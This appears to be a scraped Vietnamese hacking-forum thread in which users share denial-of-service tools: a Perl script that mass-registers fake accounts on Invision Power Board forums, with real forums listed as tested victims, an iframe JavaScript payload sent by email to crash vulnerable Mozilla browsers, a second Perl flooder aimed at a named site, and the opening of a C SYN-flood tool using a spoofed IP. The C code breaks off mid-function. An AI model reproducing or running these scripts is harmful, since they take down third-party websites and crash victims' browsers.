#!/usr/bin/perl use IO::Socket; ########################################################## ## _______ _______ ______ # ## |______ |______ | \ # ## ______| |______ |_____/ # ## # ##IPB Register Multiple Users Denial of Service # ##Doesn't Work on forums using "Code Confirmation" # ##Created By SkOd # ##SED security Team # ##http://www.sed-team.be # ##skod.uk@gmail.com # ##ISRAEL # ########################################################## print q{ ############################################################ # Invision Power Board Multiple Users DOS # # Tested on IPB 2.0.1 # # created By SkOd. SED Security Team # ############################################################ }; $rand=rand(10); print "Forum Host: "; $serv = <stdin>; chop ($serv); print "Forum Path: "; $path = <stdin>; chop ($path); for ($i=0; $i<9999; $i++) { $name="sedXPL_".$rand.$i; $data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord =sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com &EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_memb er_mail=1&day=11&month=11&year=1985&agree=1"; $len = length $data; $get1 = IO::Socket::INET- >new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Conn ect Host, it's can be beacuse the host dosed"; print $get1 "POST ".$path."index.php HTTP/1.0\n"; print $get1 "Host: ".$serv."\n"; print $get1 "Content-Type: application/x-www-form-urlencoded\n"; print $get1 "Content-Length: ".$len."\n\n"; print $get1 $data; syswrite STDOUT, "+"; } print "Forum shuld be Dosed. Check it out \n"; ^^ có thể thay $name để tạo dấu ấn riêng. tested links: http://forum.pravda.ru/ http://forum.bakililar.az/ Code: cmd: perl file.pl Host: www.sth.com Path: / Rekcor(VNISS) Kho tool DDOS http://archiv.egocrew.de/packet/DoS/ nhoccon1412(vniss) Multiple Mozilla Products IFRAME JavaScript Execution Vulnerability Exploit = cách gửi Email có nội dung: Code: <html> <body> <iframe src="javascript:alert('Found by www.sysdream.com !')"></iframe> </body> </html> * Denial of service (application crash) : <html> <body> <iframe src="javascript:parent.document.write('Found by www.sysdream.com !')"></iframe> </body> </html> Nếu victim sữ dụng trình duyệt có dính bug thì sẽ bị crash. Nguồn: http://www.securityfocus.com/bid/16770/ HAIYEN02(vniss) Perl DDoS Code: #!/usr/bin/perl use IO::Socket; my $host = "giotnuoc.com"; //site muon tan cong my $path = "/khocnhe/"; //duong dan my $data = "I_was_here"; // ghi cai gi cung duoc for ($i=1;$i<9999;$i++){ $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "Khong the ket noi toi host"; print $sock "POST ".$path."index.php?".$data." HTTP/1.1\r\n"; print $sock "Content-Length: 97321\n\n"; print $sock "Host: ".$host."\r\n"; print $sock "Referer: http://dimemaybecu.com/concu.swf\r\n"; print "Attacking \n"; } Save lai att.pl vô DOS gõ : att.pl là nó tự động tấn công . Nhớ cài perl trước khi xài nghen Code rất đơn giản, cái này là do mình code thử , mấy anh xem rùi cho ý kiến Thelast (vniss) Share code :synflood.c(windown) và Soft Code: #include <winsock2.h> #include <Ws2tcpip.h> #include <windows.h> #include <stdio.h> #pragma comment(lib,"ws2_32") #pragma comment(lib,"wsock32") #define FAKE_IP "201.79.131.18" #define SEQ 0x28376839 #define right "===============Coder Paris-ye====================\n" USHORT checksum(USHORT *buffer, int size); int flood(); typedef struct tcphdr { USHORT th_sport; USHORT th_dport; unsigned int th_seq; unsigned int th_ack; unsigned char th_lenres; unsigned char th_flag; USHORT th_win; USHORT th_sum; USHORT th_urp; }TCP_HEADER; typedef struct iphdr { unsigned char h_verlen; unsigned char tos; unsigned short total_len; unsigned short ident; unsigned short frag_and_flags; unsigned char ttl; unsigned char proto; unsigned short checksum; unsigned int sourceIP; unsigned int destIP; }IP_HEADER; struct { unsigned long saddr; unsigned long daddr; char mbz; char ptcl; unsigned short tcpl; }PSD_HEADER; WSADATA wsaData; SOCKET sockMain = (SOCKET) NULL; int ErrorCode=0,flag=true,TimeOut=2000,FakeIpNet,FakeIpHost,dataSize=0,SendSE Q=0; unsigned short activPort=40000; struct sockaddr_in sockAddr; TCP_HEADER tcpheader; IP_HEADER ipheader; char sendBuf[128]; USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size-=sizeof(USHORT); } if(size) cksum+=*(UCHAR*)buffer; cksum=(cksum >> 16)+(cksum&0xffff); cksum+=(cksum >>16); return (USHORT)(~cksum); } int main(int argc,char* argv[])